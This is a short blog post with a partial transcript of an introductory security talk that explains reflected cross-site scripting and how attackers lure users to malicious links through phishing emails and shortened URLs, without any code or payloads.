Article by Ian Broderick
This is the first part of a series of talks given by Veracode co-founder and VP of Research Chris Eng.
In this video Chris explains what Cross-Site Scripting is and how it enables an attacker to inject client-side script into web pages viewed by other users.
We have also transcribed the talk for your convenience:
The user might submit their first name and last name in the form, the web application then responds with a page containing an echo of what the user submits in the form. This is a common thing for applications to do. The XSS vulnerability occurs if the web application takes potentially dangerous data and echoes that back to the user.
The attacker can even make it so that the information gets sent to them first and then to the actual application, so that the user doesn’t know that their data is going somewhere else.
This link can be sent to somebody in a number of different ways. The attacker could send them an email claiming to be a bank saying that a fraudulent transaction was noticed and that you need to click on the link to login into the bank. If it looks official people will click the link without thinking.
Another way to do this is using a shortened URL. The attacker will send a message such as “Check out this cool new story that I read” with the link. The user will then click on the link to go to what they think is a newspaper site, but in reality this will re-direct you to a URL that contains an attack. With shortened URLs in Twitter and Facebook you can easily fool somebody into clicking on a link. This is one form of a XSS attack called reflected XSS.
To download the Cross-Site scripting cheat sheet CLICK HERE.
We hope you enjoyed this video. Keep an eye out for part two of the series.
Cross-posted from Veracode